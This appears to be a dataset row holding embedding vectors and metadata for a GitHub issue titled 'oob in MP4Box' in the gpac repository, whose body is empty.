-0.015661895275115967, -0.006476636044681072, -0.016236217692494392, 0.0019713188521564007, -0.010205843485891819, -0.0017132624052464962, -0.005875151138752699, -0.014039825648069382, -0.029352473095059395, -0.014505491591989994, 0.01780395768582821, -0.006022612098604441, -0.007466176059097052, 0.008552730083465576, -0.005952761974185705, -0.010516287758946419, 0.007722292561084032, -0.02118779718875885, 0.01239447295665741, 0.00940645020455122, 0.006107984110713005, -0.012076267972588539, -0.005840226076543331, 0.013092972338199615, -0.011494185775518417, 0.004881730768829584, 0.00632141437381506, 0.009903160855174065, 0.009709133766591549, 0.009002873674035072, -0.001554159796796739, -0.0006213728920556605, -0.00762915937229991, -0.0020198256243020296, 0.0028211590833961964, -0.0015687119448557496, -0.01733829267323017, 0.00495934160426259, -0.0034827927593141794, 0.007004390936344862, -0.0025010136887431145, 0.0054017240181565285, 0.018098879605531693, 0.023997314274311066, -0.010081666521728039, 0.015739506110548973, 0.010702554136514664, -0.000030256154786911793, -0.009685849770903587, 0.011595080606639385, 0.0035565230064094067, -0.004059054423123598, 0.008017214015126228, 0.016795014962553978, 0.015537718310952187, -0.0024428055621683598, -0.0011360306525602937, -0.02443193644285202, 0.011610602028667927, -0.019154390320181847, -0.002299225190654397, -0.010749120265245438, 0.031354837119579315, 0.006837527267634869, 0.008063781075179577, 0.019651100039482117, 0.007221701554954052, -0.011129414662718773, 0.004109501373022795, -0.00004268603879609145, -0.015429062768816948, 0.02132749743759632, -0.012658351100981236, -0.002506834687665105, 0.002091615926474333, 0.002731906482949853, -0.022367484867572784, 0.0014445343986153603, 0.027365630492568016, 0.0015134140849113464, -0.010135994292795658, -0.012239251285791397, -0.001866544014774263, -0.008017214015126228, 0.003785475390031934, 0.008187958039343357, 0.003610850777477026, 0.019604533910751343, -0.018409324809908867, 0.0010535690234974027, -0.012402234598994255, -0.01532040722668171, 0.02070660889148712, 0.037439536303281784, -0.007062599062919617, 0.01340341567993164, 0.011261353269219398, 0.0007285730680450797, 0.00224295724183321, 0.011564035899937153, 0.003901891876012087, 0.021001530811190605, -0.013481027446687222, -0.0018374399514868855, -0.00036913721123710275, 0.01606547273695469, -0.01794365793466568, 0.005362918600440025, 0.010516287758946419, 0.005723809823393822, 0.015250557102262974, -0.0001156888683908619, 0.011773585341870785, -0.009072723798453808, 0.005425007548183203, -0.01744694821536541, -0.008366463705897331, 0.0035041356459259987, -0.0053784409537911415, -0.007784381043165922, 0.016903670504689217, 0.023128071799874306, 0.019138867035508156, -0.00022070622071623802, 0.0224295724183321, -0.012487606145441532, 0.0038242810405790806, 0.0029938435181975365, 0.012875661253929138, -0.0162206944078207, 0.005681123584508896, 0.025456400588154793, 0.018611112609505653, 0.0061933561228215694, -0.02592206746339798, 0.020597953349351883, -0.013985498808324337, 0.009895400144159794, -0.009872116148471832, 0.008056019432842731, -0.00787363387644291, 0.007582592777907848, -0.00517665222287178, -0.011067325249314308, 0.0012330444296821952, 0.002718324540182948, -0.010322259739041328, -0.009949727915227413, 0.01178134698420763, -0.007671845145523548, -0.04482810199260712, -0.0027901146095246077, -0.001944154966622591, 0.0034730914048850536, 0.006872452329844236, 0.018285145983099937, 0.001909230137243867, 0.014319225214421749, 0.007186776492744684, -0.01584816165268421, -0.0003213579475414008, 0.000040442595491185784, 0.00971689447760582, 0.0034478676971048117, 0.00426860386505723, 0.006818124558776617, 0.005304710473865271, 0.01394669245928526, -0.0011321501806378365, 0.0013009540271013975, -0.007656323257833719, 0.005785898305475712, -0.016639793291687965, 0.027117276564240456, -0.003030708758160472, -0.019899455830454826, 0.007431250996887684, -0.0019208716694265604, 0.01570846140384674, -0.01792813651263714, -0.013822515495121479, -0.011928807012736797, 0.001887887017801404, -0.012309101410210133, 0.01780395768582821, 0.013574160635471344, -0.0009036828414537013, 0.0057897791266441345, -0.024074925109744072, -0.004889491479843855, 0.009352123364806175, -0.013496548868715763, 0.0038165198639035225, 0.010687031783163548, 0.006627977825701237, -0.0009924503974616528, -0.014226092025637627, 0.009220183826982975, -0.012138357385993004, -0.026216989383101463, 0.013620726764202118, 0.011812390759587288, 0.009057201445102692, -0.02280210517346859, 0.009243467822670937, 0.005413365550339222, 0.008521685376763344, 0.0045790476724505424, 0.036321938037872314, -0.003692342434078455, -0.014303703792393208, 0.020039154216647148, 0.029585305601358414, -0.01733829267323017, -0.021343018859624863, 0.007947363890707493, 0.0004074576427228749, 0.01301536150276661, -0.013434460386633873, -0.012115073390305042, -0.011129414662718773, 0.0078076645731925964, 0.02918172813951969, -0.01140881422907114, 0.00303846993483603, -0.001277670729905367, -0.00501366937533021, 0.027862342074513435, 0.014257136732339859, -0.022972850129008293, -0.008583773858845234, -0.017043370753526688, 0.018766334280371666, 0.0178194809705019, 0.005219338461756706, 0.004373378586024046, 0.028188306838274002, -0.003488613525405526, -0.007671845145523548, 0.027194887399673462, -0.013760427013039589, -0.005875151138752699, -0.024587158113718033, -0.02780025266110897, 0.005056355148553848, 0.0078464699909091, 0.02019437588751316, -0.02329881675541401, -0.010050621815025806, -0.007326476275920868, -0.016003383323550224, -0.02280210517346859, 0.005036952439695597, -0.003915473818778992, -0.005634556990116835, -0.007008271291851997, 0.007008271291851997, -0.008630340918898582, 0.011307919397950172, 0.0037680130917578936, -0.010888820514082909, 0.010485243052244186, -0.006841407623142004, -0.0027125037740916014, -0.030951257795095444, -0.005723809823393822, -0.010066144168376923, -0.013193866237998009, -0.02443193644285202, 0.02568923309445381, 0.0031277225352823734, 0.0071052853018045425, 0.015770550817251205, 0.0012281937524676323, -0.023236727342009544, 0.01121478620916605, 0.01930961199104786, 0.020473776385188103, -0.017105460166931152, -0.010555093176662922, -0.00896406825631857, -0.01239447295665741, 0.02865397371351719, 0.0023341502528637648, 0.009453017264604568, 0.03265869989991188, -0.01656218245625496, 0.029849182814359665, 0.019790800288319588, 0.005347396247088909, -0.01656218245625496, 0.02356269396841526, -0.007730053272098303, -0.007411848288029432, 0.0015745327109470963, -0.026713699102401733, -0.01221596822142601, -0.006236042361706495, -0.0013184165582060814, -0.012316862121224403, -0.025735801085829735, 0.016112038865685463, 0.004905013833194971, -0.03852609172463417, -0.013116255402565002, 0.025611622259020805, 0.016422482207417488, 0.0199460219591856, -0.012604023329913616, 0.029693961143493652, -0.008498402312397957, 0.009903160855174065, -0.022476138547062874, -0.01595681719481945, 0.013783710077404976, -0.007279909681528807, 0.026744743809103966, 0.015157423913478851, -0.007341998629271984, -0.014179525896906853, 0.01035330444574356, -0.01576278917491436, 0.010298976674675941, 0.01109836995601654, 0.002559222048148513, -0.02739667519927025, 0.00012781558325514197, 0.012441040016710758, -0.007640800904482603, -0.009352123364806175, 0.0027998159639537334, 0.006872452329844236, 0.009592716582119465, 0.005002027377486229, -0.008071541786193848, 0.0008896158542484045, 0.003490553703159094, -0.029228294268250465, 0.004839044529944658, -0.00362831330858171, 0.002081914572045207, 0.005816943012177944, -0.004947700072079897, -0.0029822017531841993, -0.00005560099089052528, -0.004501436837017536, 0.002256539184600115, 0.012619544751942158, 0.00011162641749251634, 0.005673362407833338, 0.021249886602163315, -0.004835164174437523, -0.011044042184948921, 0.000701409240718931, 0.017415903508663177, -0.0027163843624293804, -0.0066124554723501205, -0.0104619599878788, -0.0016424423083662987, -0.000019827179130516015, -0.0266826543956995, -0.015351451933383942, 0.006142909172922373, -0.004563525784760714, -0.0073458789847791195, -0.01308521069586277, -0.01146314200013876, -0.0007601025281473994, -0.023624781519174576, 0.01584816165268421, -0.003653536783531308, 0.0168415829539299, 0.003969801589846611, -0.006662902422249317, -0.009755699895322323, -0.016857104375958443, -0.014854741282761097, 0.01172701921314001, 0.002008184092119336, -0.03948846459388733, 0.008125869557261467, -0.0069927494041621685, 0.02142062969505787, -0.001459086430259049, 0.015429062768816948, 0.00044092736789025366, 0.02393522672355175, -0.003024887992069125, -0.01980632171034813, 0.02578236721456051, -0.019883932545781136, 0.021405108273029327, 0.017415903508663177, 0.005044713616371155, -0.010120471939444542, 0.028374573215842247, 0.002502954099327326, 0.00928227324038744, 0.009647044353187084, -0.004206514917314053, 0.001666695810854435, 0.008234525099396706, 0.006682305131107569, 0.010050621815025806, 0.020535865798592567, -0.008296613581478596, -0.023842092603445053, 0.0033101083245128393, 0.015157423913478851, -0.020163333043456078, 0.022833149880170822, -0.016143083572387695, -0.021498240530490875, 0.005355157423764467, 0.004866208415478468, 0.014365792274475098, 0.011858957819640636, -0.005638437811285257, 0.03026828169822693, -0.007373042870312929, -0.012945511378347874, 0.01046972069889307, 0.0005466723232530057, 0.01668636128306389, 0.019107822328805923, -0.008886457420885563, -0.008839890360832214, -0.0031587667763233185, -0.002611609408631921, -0.006375742144882679, 0.00048676636652089655, 0.00004298920612200163, -0.009763461537659168, 0.00852944701910019, -0.0209239199757576, 0.04656658694148064, -0.01572398468852043, -0.012441040016710758, -0.007788261864334345, -0.023966269567608833, 0.0035953286569565535, 0.0307649914175272, -0.014272659085690975, 0.0203030314296484, -0.022631362080574036, -0.007295432034879923, 0.0018539322772994637, -0.037191182374954224, -0.006903496570885181, -0.00517665222287178, -0.01259626168757677, -0.010749120265245438, 0.017043370753526688, 0.009833310730755329, -0.009786744602024555, -0.006569769233465195, -0.012751484289765358, 0.007439012173563242, -0.01190552394837141, 0.0024059403222054243, 0.0026251913513988256, -0.0027513091918081045, 0.021156752482056618, -0.003793236566707492, 0.011377769522368908, 0.005995448213070631, 0.0002359858772251755, 0.010850015096366405, -0.005196054931730032, -0.001112747355364263, 0.0052969492971897125, 0.005021430552005768, 0.002264300361275673, -0.024400891736149788, 0.0039503988809883595, 0.01396997645497322, 0.019542444497346878, 0.007613637018948793, -0.005502618383616209, 0.016515616327524185, 0.0026950412429869175, 0.009786744602024555, -0.000014392895536730066, 0.028747105970978737, 0.001722963759675622, -0.02716384269297123, 0.04122695326805115, 0.006860810332000256, 0.00804825872182846, -0.007924080826342106, -0.0035856273025274277, -0.0162206944078207, -0.011020759120583534, 0.010912103578448296, -0.02120331861078739, -0.0022972850129008293, -0.031122002750635147, -0.009367644786834717, -0.02019437588751316, -0.0035487620625644922, 0.002178928116336465, 0.012976556085050106, -0.011688213795423508, -0.00303846993483603, -0.007310954388231039, -0.0022196739446371794, 0.004955460783094168, 0.0006587231764569879, -0.005836345721036196, 0.0014629669021815062, 0.003993084654211998, 0.005910076200962067, -0.016344871371984482, -0.006286489311605692, -0.010477482341229916, 0.02020989917218685, -0.005479335319250822, -0.010531810112297535, -0.009134812280535698, 0.00019754419918172061, 0.004532481078058481, 0.013900126330554485, -0.009064962156116962, 0.012363429181277752, 0.01164164673537016, 0.0011059565003961325, -0.0068220049142837524, -0.0010108830174431205, 0.03542165085673332, 0.010135994292795658, 0.00821900274604559, -0.00573157100006938, 0.007730053272098303, -0.02044273167848587, -0.009150334633886814, 0.005774256773293018, 0.005797540303319693, 0.005754854064434767, -0.0024098209105432034, -0.017540080472826958, 0.012541933916509151, -0.0026892204768955708, 0.008576013147830963, -0.002182808704674244, -0.00009458838030695915, 0.00009701372619019821, -0.011238069273531437, 0.011750302277505398, -0.007439012173563242, 0.008816607296466827, 0.0075088622979819775, 0.0032286166679114103, -0.019247522577643394, -0.019480355083942413, -0.000723237288184464, -0.006189475767314434, 0.006732752546668053, 0.004152187146246433, 0.02789338491857052, -0.01730724796652794, -0.026837876066565514, 0.012798050418496132, -0.016360394656658173, 0.002039228565990925, 0.02008572220802307, 0.0044975560158491135, -0.002970560221001506, 0.002726085716858506, 0.02120331861078739, -0.005774256773293018, 0.012324623763561249, -0.00929003395140171, -0.0008037586812861264, -0.014001020230352879, 0.0012146118097007275, 0.024447457864880562, -0.01565413363277912, 0.006515441462397575, -0.006562008056789637, 0.0034478676971048117, -0.015677418559789658, -0.002489372156560421, -0.011633886024355888, 0.007062599062919617, 0.010904342867434025, 0.0033954803366214037, 0.004575167316943407, 0.013310282491147518, -0.013496548868715763, 0.0214516744017601, 0.007710650563240051, -0.015359212644398212, 0.012821333482861519, -0.000978868454694748, 0.016282783821225166, 0.004346214700490236, -0.0030927974730730057, 0.009802266955375671, -0.011827913112938404, -0.0037039839662611485, -0.0156929399818182, -0.012813572771847248, 0.007718411739915609, 0.005681123584508896, 0.009336601011455059, -0.009895400144159794, 0.008622580207884312, 0.010004054754972458, -0.000004627099770004861, -0.015064290724694729, -0.015297124162316322, -0.001715202583000064, -0.002450566738843918, 0.004710986278951168, 0.012417756952345371, 0.005436649080365896, 0.019868411123752594, 0.013659532181918621, 0.017974702641367912, 0.006891855038702488, 0.02044273167848587, 0.011626124382019043, 0.0230504609644413, -0.007912439294159412, 0.00015182647621259093, 0.009057201445102692, 0.024400891736149788, 0.01668636128306389, -0.019045734778046608, -0.0018849766347557306, 0.021637940779328346, 0.01721411570906639, -0.0008464447455480695, 0.014536536298692226, -0.01708993688225746, -0.004710986278951168, -0.016251739114522934, 0.0016773672541603446, -0.005657840520143509, 0.0025126554537564516, -0.011245830915868282, -0.010159277357161045, -0.030718425288796425, 0.007916320115327835, -0.011820152401924133, 0.010477482341229916, -0.012247011996805668, -0.003259661141782999, 0.02281762845814228, -0.0021672865841537714, 0.018114402890205383, 0.012464323081076145, -0.004101740196347237, -0.011711496859788895, 0.030982302501797676, 0.0070160324685275555, -0.005525901913642883, -0.024105969816446304, -0.004645016975700855, 0.026511911302804947, 0.022786583751440048, 0.006802602205425501, 0.012875661253929138, -0.01643800549209118, -0.0125885009765625, -0.004621733911335468, 0.001299013732932508, 0.007198418490588665, -0.0017423664685338736, 0.005945000797510147, -0.012728200294077396, 0.027691597118973732, -0.007520503830164671, -0.010446437634527683, 0.02879367396235466, 0.024509547278285027, 0.004082337487488985, -0.0019907215610146523, 0.004105620551854372, 0.016546661034226418, 0.014668474905192852, 0.01983736641705036, 0.01955796591937542, -0.007617517374455929, -0.027691597118973732, 0.017540080472826958, -0.007768859155476093, -0.001631770865060389, 0.0122780567035079, -0.009041679091751575, 0.011020759120583534, -0.007338118273764849, -0.02280210517346859, 0.0014066989533603191, 0.00451307836920023, -0.02193286269903183, -0.005587990395724773, 0.010943148285150528, -0.0013125956756994128, -0.0037175659090280533, 0.009763461537659168, -0.007679606322199106, -0.008405269123613834, 0.004404422827064991, -0.025984155014157295, 0.0026872800663113594, -0.0033062277361750603, 0.0010458079632371664, 0.0029201130382716656, -0.010306738317012787, 0.014629669487476349, 0.01671740412712097, 0.01708993688225746, -0.004431586712598801, 0.028933372348546982, -0.018890513107180595, 0.011882240884006023, -0.007528265006840229, 0.006562008056789637, 0.00116028415504843, 0.02055138722062111, 0.006515441462397575, 0.003368316451087594, 0.014451163820922375, -0.012122835032641888, 0.0019034092547371984, -0.012169401161372662, 0.0034110024571418762, 0.0009759580716490746, -0.018021268770098686, 0.006457233335822821, -0.02069108746945858, -0.005452171433717012, -0.011315681040287018, -0.004059054423123598, 0.0007537966594099998, -0.012541933916509151, -0.0033062277361750603, 0.011300158686935902, -0.008995112031698227, -0.0016531138680875301, 0.007493339944630861, -0.0019946021493524313, 0.01934065669775009, -0.004408303648233414, 0.005285307765007019, 0.0024660888593643904, 0.005832464899867773, 0.013271477073431015, -0.0361667163670063, 0.008444074541330338, 0.002351612551137805, -0.012541933916509151, -0.0013310282956808805, -0.010749120265245438, 0.004753672517836094, 0.002008184092119336, -0.02503730170428753, 0.012999839149415493, 0.0017171428771689534, -0.018781857565045357, -0.03560791537165642, -0.009266750887036324, 0.0027687717229127884, 0.01656218245625496, -0.015661895275115967, 0.00042831560131162405, -0.02404388040304184, -0.005343515891581774, 0.04175470769405365, -0.0018102760659530759, 0.01581711694598198, -0.017648736014962196, 0.02170003019273281, 0.0013397595612332225, -0.0022701211273670197, 0.015483390539884567, 0.005875151138752699, -0.021855251863598824, -0.014117437414824963, -0.004322931636124849, 0.00916585698723793, 0.012658351100981236, 0.017602169886231422, 0.008327658288180828, 0.014854741282761097, -0.024494023993611336, -0.002281762892380357, -0.025456400588154793, 0.003131602890789509, -0.005941120442003012, -0.0009274511830881238, 0.007893036119639874, 0.008490640670061111, 0.0016046069795265794, 0.02143615297973156, -0.005428887903690338, 0.014482208527624607, 0.01572398468852043, 0.001116627943702042, -0.004334573168307543, 0.016112038865685463, -0.00029249637736938894, 0.007660203613340855, -0.004412184003740549, -0.03874339908361435, 0.0027435480151325464, 0.0009274511830881238, 0.020504821091890335, -0.005211577285081148, 0.00972465518862009, -0.0021886297035962343, -0.005735451355576515, -0.030609769746661186, 0.013861320912837982, 0.016779493540525436, 0.03650820627808571, -0.0018752752803266048, -0.010384349152445793, 0.00042855812353082, 0.025021780282258987, 0.002012064680457115, -0.006232161540538073, 0.01794365793466568, 0.005615154281258583, -0.008878695778548717, -0.0079357223585248, 0.010252410545945168, 0.0043927812948822975, -0.014707280322909355, 0.005537543445825577, -0.007609756663441658, -0.03140140324831009, -0.011416574940085411, 0.008343180641531944, 0.029352473095059395, 0.0026853398885577917, -0.000391692912671715, -0.0011631945380941033, 0.006340817082673311, 0.005335754714906216, 0.0014358031330630183, -0.0007285730680450797, -0.0276605524122715, -0.002776532666757703, -0.00535903824493289, 0.01929408870637417, 0.00003816883690888062, 0.0012262534582987428, -0.007272148504853249, 0.0006165222148410976, 0.02044273167848587, 0.012091790325939655, 0.01755560375750065, 0.0052736662328243256, -0.008118108846247196, -0.009173617698252201, 0.02020989917218685, -0.005281426943838596, 0.0029511575121432543, 0.04141321778297424, 0.017353814095258713, -0.0013475206214934587, -0.008607057854533195, -0.0016152785392478108, 0.003052051644772291, -0.005999328568577766, 0.013481027446687222, -0.014598624780774117, 0.004000845830887556, -0.023531649261713028, -0.0004186142177786678, -0.005099041387438774, 0.008513924665749073, 0.011975374072790146, 0.0031122001819312572, -0.028607407584786415, 0.004800239112228155, 0.009096006862819195, -0.017120981588959694, -0.0245561134070158, -0.02665160968899727, 0.02992679364979267, -0.012720439583063126, 0.006410666741430759, 0.00847511924803257, 0.015630850568413734, -0.020768698304891586, -0.016282783821225166, 0.005188293755054474, 0.007151851896196604, 0.0062011172994971275, -0.015242796391248703, 0.013550876639783382, 0.003985323943197727, 0.011967613361775875, -0.010298976674675941, -0.004206514917314053, 0.011882240884006023, -0.010733597911894321, 0.005397843662649393, 0.006073059048503637, -0.007303193211555481, 0.00004756704220199026, 0.009996294043958187, 0.014761608093976974, -0.007927961647510529, -0.0015958757139742374, 0.0011098369723185897, -0.004047412425279617, 0.017912613227963448, -0.0049671027809381485, 0.01365177147090435, 0.018393801525235176, 0.0018859468400478363, 0.016344871371984482, 0.00011023184197256342, 0.01046972069889307, -0.026496388018131256, 0.01583264023065567, 0.01264282874763012, 0.008878695778548717, -0.008560490794479847, 0.013248194009065628, 0.0022448976524174213, -0.004334573168307543, -0.00707424059510231, 0.005347396247088909, -0.010190321132540703, -0.018021268770098686, 0.00884765200316906, 0.007470056880265474, 0.006833646912127733, 0.009786744602024555, -0.011921046301722527, 0.011657169088721275, 0.011346724815666676, 0.004749791696667671, 0.015436823479831219, 0.022507183253765106, 0.003593388246372342, -0.04271708428859711, -0.010283454321324825, 0.00029249637736938894, 0.02118779718875885, -0.006313653197139502, -0.0031160807702690363, -0.028498752042651176, -0.017788436263799667, 0.0029899629298597574, 0.04076128453016281, -0.019759755581617355, -0.007407967932522297, -0.021731074899435043, 0.0009230856085196137, -0.0018733349861577153, -0.010415392927825451, 0.02494416944682598, -0.019216477870941162, 0.02905755117535591, 0.019666621461510658, -0.0075166234746575356, 0.012006418779492378, 0.03529747202992439, 0.0072915516793727875, -0.005875151138752699, 0.02592206746339798, 0.007431250996887684, -0.00047779257874935865, -0.005844106897711754, 0.013178343884646893, -0.019418267533183098, 0.0064999195747077465, 0.006340817082673311, -0.002000422915443778, 0.0043694982305169106, 0.00241564167663455, -0.013799232430756092, -0.019868411123752594, 0.014032064937055111, -0.0004576622450258583, -0.011222547851502895, -0.0073575209826231, -0.02055138722062111, -0.007497220765799284, -0.014862501993775368, -0.007656323257833719, -0.005487096030265093, -0.00971689447760582, 0.013589682057499886, -0.040823373943567276, -0.0019363939063623548, -0.02193286269903183, 0.0014881904935464263, 0.0010749120265245438, -0.01164164673537016, 0.013186105526983738, -0.007555428892374039, -0.000008920715117710643, 0.009647044353187084, 0.0018199774203822017, 0.011005236767232418, -0.0005403664545156062, -0.00579365948215127, 0.0027028024196624756, 0.000640775659121573, -0.009049439802765846, 0.01365177147090435, 0.01882842369377613, -0.006562008056789637, 0.003269362496212125, 0.00666678324341774, -0.007927961647510529, 0.02168450690805912, -0.005099041387438774, -0.0001675912062637508, -0.010120471939444542, 0.0010623002890497446, 0.002468029037117958, 0.007815425284206867, 0.019232001155614853, -0.0006965585635043681, 0.0055724685080349445, 0.009220183826982975, 0.006926779635250568, 0.01670188270509243, 0.01707441546022892, 0.012557456269860268, -0.010756881907582283, -0.001701620756648481, 0.011602841317653656, -0.026620564982295036, -0.006969465874135494, 0.011874480172991753, -0.0034556288737803698, 0.0033430929761379957, -0.01730724796652794, 0.0037990573327988386, 0.00747393723577261, 0.017866047099232674, 0.012076267972588539, -0.0024175820872187614, -0.01632934994995594, -0.0011796868639066815, 0.012014179490506649, -0.02966291643679142, -0.0015638612676411867, -0.00782706681638956, 0.003026828169822693, -0.009647044353187084, 0.01943378895521164, -0.0199460219591856, 0.02081526443362236, 0.016857104375958443, -0.01620517298579216, 0.016143083572387695, 0.009934205561876297, 0.003618611954152584, 0.024882080033421516, -0.02879367396235466, 0.007850350812077522, 0.009173617698252201, 0.006853049620985985, -0.011028519831597805, -0.002714443951845169, -0.01955796591937542, -0.01483145821839571, -0.020396165549755096, -0.004873969592154026, -0.018874989822506905, 0.003077275352552533, 0.014365792274475098, 0.00779214221984148, -0.011137175373733044, -0.0035642841830849648, -0.011393291875720024, -0.00592171773314476, 0.00685692997649312, -0.029010983183979988, -0.007283790502697229, -0.007842589169740677, 0.0008464447455480695, 0.025177001953125, -0.005122324451804161, 0.05653183534741402, 0.026496388018131256, 0.014559819363057613, -0.0063873836770653725, 0.007089762948453426, 0.001069091260433197, 0.0030539920553565025, -0.011486425064504147, -0.031479012221097946, 0.011990896426141262, -0.016391439363360405, -0.010601659305393696, 0.004439347889274359, -0.0025708635803312063, -0.0005403664545156062, 0.0021110186353325844, 0.0048041194677352905, -0.012774767354130745, -0.019899455830454826, 0.0018907975172623992, -0.017136504873633385, -0.015824878588318825, 0.02031855471432209, 0.006018731277436018, 0.002580564934760332, 0.006643499713391066, 0.0101515157148242, 0.004827402997761965, 0.01477713044732809, -0.008762279525399208, 0.012091790325939655, 0.00303846993483603, -0.0053784409537911415, 0.01588696800172329, 0.004905013833194971, 0.01452101394534111, -0.0017860226798802614, 0.027629507705569267, -0.0033392123878002167, -0.002784293843433261, 0.009608238935470581, 0.011121653020381927, -0.009794505313038826, -0.007858111523091793, -0.011913285590708256, 0.004679942037910223, -0.004548003431409597, -0.023655826225876808, 0.012363429181277752, -0.00854496844112873, -0.014218331314623356, 0.021591374650597572, -0.0122780567035079, -0.005036952439695597, 0.019790800288319588, -0.003944578114897013, -0.014738325029611588, -0.0028987701516598463, 0.006724991369992495, 0.004183231852948666, -0.015801595523953438, 0.007667964790016413, -0.002450566738843918, 0.011509708128869534, -0.00533187435939908, 0.01052404846996069, 0.008273330517113209, 0.0020334075670689344, -0.015056530013680458, -0.011005236767232418, 0.004264723509550095, 0.004912775009870529, -0.0018549023661762476, 0.011137175373733044, -0.003709804732352495, -0.014590864069759846, 0.023609260097146034, -0.005735451355576515, -0.001606547273695469, 0.014039825648069382, -0.0024660888593643904, -0.012316862121224403, 0.0066861859522759914, -0.00816467497497797, -0.01420280896127224, -0.01858006790280342, 0.0014581162249669433, -0.006065297871828079, -0.005801420658826828, 0.02042721025645733, -0.024835513904690742, 0.021715551614761353, -0.01806783676147461, 0.008187958039343357, -0.007295432034879923, 0.004028009716421366, -0.0005811122246086597, 0.01993049867451191, 0.019030211493372917, 0.003952339291572571, -0.012316862121224403, -0.00470322510227561, -0.04110277444124222, 0.009437494911253452, -0.007004390936344862, -0.011874480172991753, -0.023003894835710526, -0.03144796937704086, -0.005653959698975086, -0.0026445940602570772, -0.013822515495121479, 0.014482208527624607, -0.01893707923591137, 0.0010846133809536695, -0.006302011664956808, 0.005052474793046713, 0.0006679394864477217, 0.01351207122206688, 0.0027435480151325464, 0.004827402997761965, 0.004648897796869278, -0.004187112208455801, -0.0028095173183828592, -0.0033430929761379957, -0.0008381985826417804, -0.018347235396504402, -0.0013387893559411168, 0.023267772048711777, -0.003733088029548526, 0.01414072047919035, 0.010198082774877548, -0.02008572220802307, 0.0215448085218668, 0.0034090622793883085, -0.0003094737767241895, 0.02056690864264965, 0.01396997645497322, -0.0029239936266094446, -0.0049903858453035355, 0.013007599860429764, -0.018254103139042854, 0.0466286763548851, -0.0026251913513988256, -0.006565888877958059, -0.0003385778982192278, -0.003094737883657217, -0.014109675772488117, -0.02056690864264965, -0.007411848288029432, -0.023888658732175827, 0.009965249337255955, -0.001870424603112042, 0.022351961582899094, 0.007648562081158161, -0.01532040722668171, 0.01584816165268421, -0.008009453304111958, 0.030563203617930412, -0.015421301126480103, 0.013861320912837982, -0.0035390607081353664, -0.002532058162614703, -0.01743142493069172, 0.03899175673723221, -0.001532816793769598, 0.010368826799094677, 0.020986009389162064, 0.001909230137243867, 0.01234014518558979, -0.010174799710512161, 0.0004792477993760258, 0.004101740196347237, 0.0059255980886518955, 0.002549520693719387, 0.01339565496891737, -0.0001508563436800614, -0.0023263890761882067, -0.008979590609669685, 0.02565819025039673, 0.02728801965713501, 0.012200445868074894, -0.024882080033421516, -0.02170003019273281, 0.0030113060493022203, -0.009018396027386189, 0.0013843858614563942, -0.007082001771777868, -0.012891183607280254, 0.0120995519682765, 0.02156032994389534, 0.007920200005173683, -0.015219513326883316, 0.0032713026739656925, -0.012014179490506649, -0.018238579854369164, -0.01327923871576786, 0.0075399065390229225, -0.023159116506576538, 0.0038805489894002676, -0.017369337379932404, -0.02058243192732334, -0.013550876639783382, -0.0003077760338783264, 0.01732277125120163 ]
1,765
null
null
null
null
null
null
null
null
null
[ "gpac", "gpac" ]
null
oob in MP4Box
https://api.github.com/repos/gpac/gpac/issues/1781/comments
1
2021-05-08T05:10:18
2023-09-22T06:14:10Z
https://github.com/gpac/gpac/issues/1781
880,292,426
1,781
false
This is a GitHub Issue repo:gpac owner:gpac Title : oob in MP4Box Issue date: --- start body --- None --- end body ---
120
[ -0.01777803897857666, 0.032767366617918015, -0.0037321755662560463, 0.02340093068778515, 0.021688297390937805, 0.005952536128461361, -0.020824404433369637, 0.059987619519233704, -0.025507621467113495, 0.02434060536324978, 0.004683217499405146, 0.028341801837086678, 0.04013320431113243, -0.011026021093130112, -0.01783866249024868, -0.00023882609093561769, -0.00055366923334077, 0.00741888303309679, 0.0033722196239978075, -0.019430046901106834, 0.02697775699198246, -0.026811040937900543, -0.022021731361746788, 0.04143662378191948, -0.03328267112374306, 0.021627673879265785, -0.03191862627863884, 0.023613115772604942, -0.007502241525799036, 0.0002998054842464626, -0.004558179993182421, 0.017990224063396454, -0.01764163374900818, 0.027311190962791443, 0.03610169515013695, -0.010442513972520828, 0.05071211978793144, 0.0461956188082695, -0.00910120364278555, -0.009366434998810291, -0.01452706754207611, -0.05189429223537445, -0.018475215882062912, 0.02547730877995491, -0.011041177436709404, 0.011980852112174034, 0.017611322924494743, -0.004402830731123686, -0.031130513176321983, 0.012632561847567558, 0.012488579377532005, -0.025947146117687225, 0.0019333427771925926, -0.038223542273044586, -0.019581608474254608, -0.04137599840760231, 0.02373436465859413, -0.014640738256275654, -0.008449493907392025, 0.03655637800693512, -0.009252764284610748, 0.01404965203255415, 0.0007649065810255706, 0.028523674234747887, -0.010404624044895172, 0.011450390331447124, -0.0006734966882504523, 0.023673739284276962, -0.02309780940413475, 0.03628356754779816, 0.012390065006911755, -0.022142978385090828, 0.005675938446074724, 0.028402425348758698, 0.010935084894299507, -0.0214003324508667, 0.034525465220212936, 0.024264825507998466, -0.03467702865600586, 0.01695961318910122, -0.040406011044979095, 0.02578043006360531, -0.026265423744916916, 0.022112667560577393, -0.011185159906744957, -0.016611022874712944, -0.006820219568908215, -0.061866968870162964, -0.036829184740781784, -0.03231268376111984, -0.007873564958572388, 0.04907526820898056, 0.01789928786456585, 0.004952237010002136, 0.03216112405061722, 0.008449493907392025, -0.010510715655982494, 0.004626382142305374, -0.029402723535895348, -0.017171796411275864, -0.01035915594547987, -0.0158986896276474, 0.007172597572207451, -0.006312491837888956, -0.011935384012758732, 0.0016036988236010075, 0.029251163825392723, -0.022264227271080017, 0.02315843477845192, 0.12621952593326569, 0.024431541562080383, 0.006160931661725044, -0.015004483051598072, 0.0029402724467217922, 0.021324552595615387, 0.025325749069452286, -0.02773555926978588, -0.033070486038923264, -0.030190838500857353, -0.012973573058843613, -0.009669555351138115, 0.001573386718519032, -0.028341801837086678, 0.01608056202530861, -0.003982250578701496, 0.0347982756793499, -0.01627759076654911, 0.0045165009796619415, -0.02434060536324978, 0.014913546852767467, -0.04073944315314293, -0.016368526965379715, 0.03598044812679291, -0.02722025290131569, -0.010654698126018047, 0.0025954723823815584, -0.040709130465984344, 0.017171796411275864, 0.011344298720359802, 0.027871964499354362, -0.05810827016830444, -0.037283867597579956, 0.03510139510035515, 0.005092430394142866, -0.019096614792943, 0.013246381655335426, 0.007987234741449356, -0.02152158133685589, -0.042164113372564316, 0.003160035004839301, -0.00888901948928833, -0.0311002004891634, 0.018323656171560287, 0.019445203244686127, 0.05243990942835808, -0.001508026267401874, 0.013413098640739918, 0.017853818833827972, -0.007100606337189674, -0.02290078066289425, -0.0015279186191037297, -0.034525465220212936, 0.00488024577498436, -0.014549801126122475, -0.01442855317145586, -0.03485890105366707, 0.03913290426135063, 